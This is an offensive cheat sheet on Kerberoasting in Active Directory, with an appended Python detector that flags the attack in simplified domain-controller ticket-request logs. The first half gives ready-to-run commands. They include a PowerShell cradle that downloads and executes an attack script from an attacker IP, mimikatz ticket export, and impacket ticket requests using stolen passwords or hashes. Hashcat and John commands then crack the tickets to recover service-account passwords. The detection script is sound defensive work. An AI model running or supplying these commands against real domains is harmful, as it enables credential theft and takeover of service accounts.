Ticket manipulations (mimikatz)

invoke-kerberoast.ps1 automatically enumerates all service principal names in the domain, requests service tickets for them, and exports them in a format ready for cracking in both John the Ripper and Hashcat
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.132:8080/invoke-kerberoast.ps1'); Invoke-Kerberoast -Domain 'domain.com' | fl"

Import-Module .\invoke-kerberoast.ps1 (or . .\invoke-kerberoast.ps1)
Invoke-Kerberoast -Domain 'domain.com' | fl
(add -Server 'dc01.domain.com' to target a specific domain controller)

# with explicit credentials
$SecPassword = ConvertTo-SecureString 'Pass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain\user.x', $SecPassword)
Invoke-Kerberoast -Credential $Cred -Verbose | fl

Request a single service ticket

SPN examples: MSSQLSvc/xor-app23.xor.com:1433, HTTP/CorpWebServer.corp.com

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '{SPN}'

List the cached tickets with klist, or in mimikatz with
sekurlsa::tickets

Dump the tickets as .kirbi files for kerberoasting (no admin rights needed)

.\mimikatz.exe "kerberos::list /export" "exit"

Transfer the exported .kirbi files with scp, an nc binary, or SMB

With a domain user's password or NTLM hash, request the service tickets for kerberoasting from Kali

proxychains impacket-GetUserSPNs domain.local/user:"pwd" -dc-ip 10.10.10.10 -request

proxychains impacket-GetUserSPNs domain.local/user -hashes lm:nt -dc-ip 10.10.10.10 -request

Crack the service tickets offline to recover the service account's cleartext password

kirbi2john exported.kirbi > johnkirbi.txt

hashcat -m 13100 --force johnkirbi.txt /usr/share/wordlists/rockyou.txt
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt johnkirbi.txt
tgsrepcrack /usr/share/wordlists/rockyou.txt xxxx.kirbi
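Every ticket request above lands on the domain controller as Security event 4769 (Kerberos service ticket requested), and kerberoasting stands out as one account pulling RC4-encrypted (0x17) tickets for many distinct service accounts in a short window. The script below is an added defender-side example, not part of this cheat sheet; it runs over constructed, simplified 4769 records (timestamp, requesting account, target service name, ticket encryption type) and flags that pattern.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified 4769 records: timestamp, requesting account, target
# service name (sAMAccountName of the account holding the SPN), ticket
# encryption type. Real events carry more fields; only these four matter here.
SAMPLE_4769 = """\
2024-01-15T10:00:01 user.x svc_sql 0x17
2024-01-15T10:00:02 user.x svc_web 0x17
2024-01-15T10:00:02 user.x svc_backup 0x17
2024-01-15T10:00:03 user.x DC01$ 0x17
2024-01-15T10:05:00 alice svc_sql 0x12
2024-01-15T10:06:00 WS01$ svc_web 0x12
"""

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP ticket encryption


def parse_4769(text):
    """Parse the simplified records into a list of event dicts."""
    events = []
    for line in text.splitlines():
        ts, account, service, etype = line.split()
        events.append({"time": datetime.fromisoformat(ts), "account": account,
                       "service": service, "etype": etype})
    return events


def detect_kerberoast(events, threshold=3, window=timedelta(minutes=5)):
    """Return {account: sorted service names} for accounts that obtained RC4
    tickets for at least `threshold` distinct user-account services within
    `window`. Computer accounts ($) and krbtgt are not crackable targets."""
    by_account = defaultdict(list)
    for ev in events:
        if (ev["etype"] in RC4_ETYPES and not ev["service"].endswith("$")
                and ev["service"].lower() != "krbtgt"):
            by_account[ev["account"]].append(ev)
    hits = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):  # sliding window from each request
            services = {e["service"] for e in evs[i:]
                        if e["time"] - first["time"] <= window}
            if len(services) >= threshold:
                hits[account] = sorted(services)
                break
    return hits


if __name__ == "__main__":
    for account, services in detect_kerberoast(parse_4769(SAMPLE_4769)).items():
        print(f"possible kerberoasting by {account}: {', '.join(services)}")
```

Legitimate RC4 traffic from legacy clients and accounts that only request one or two tickets are left out by the encryption-type and threshold filters, so tune `threshold` and `window` to the environment's baseline.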
